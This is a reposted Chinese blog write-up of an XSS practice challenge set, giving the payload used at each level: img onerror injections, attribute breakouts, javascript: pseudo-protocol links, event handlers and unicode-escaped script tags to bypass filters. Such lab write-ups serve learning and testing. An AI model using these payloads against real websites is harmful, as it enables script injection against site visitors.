码迷,mamicode.com
首页 > 其他好文 > 详细

XSS Challenges

时间:2019-05-06 11:50:44      阅读:174      评论:0      收藏:0      [点我收藏+]

标签:pre   javascrip   ike   元素   修改   doc   err   java   image   

1.

没有过滤

<img src=1 onerror=alert(document.domain)>

技术图片

2.

输入第一关的payload

查看源码

技术图片

"><img src=1 onerror=alert(document.domain)>

技术图片

3.

发现字符被转义

技术图片

抓包,发现有两个参数

技术图片

修改第二个参数

技术图片

4.

抓包发现有三个参数

技术图片

修改第三个参数

技术图片

发现还是没有弹窗,查看源码

技术图片

修改第三个参数

技术图片

5.

发现限制了输入框的长度

技术图片

查看元素,修改长度

技术图片

6.

技术图片

发现没有过滤引号,但是尖括号被HTML实体转义了

使用事件触发XSS

技术图片

7.

技术图片

没有引号,使用事件

技术图片

8.

技术图片

href 可以使用伪协议,然后点击

javascript:alert(document.domain)

10.

发现domain被过滤了

技术图片技术图片

11.

技术图片

过滤了事件

技术图片

<script>标签也不行

想到还可以使用javascript伪协议

技术图片

发现s还是有问题,于是先编码试试

"><a href=javascript:alert(document.domain)>1</a>

12.

去网上找了找大佬们写的,发现使用`,在IE下解析成引号

技术图片

15.

dom型

输入<img src=1 onerror=alert(1)>

发现过滤了<>输入在<script>标签中,使用编码

\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003ealert(document.domain)\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e

输入之后\都被过滤了

\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e

16.

\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003ealert(document.domain)\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e

XSS Challenges

标签:pre   javascrip   ike   元素   修改   doc   err   java   image   

原文地址:https://www.cnblogs.com/zmqqq/p/10818568.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!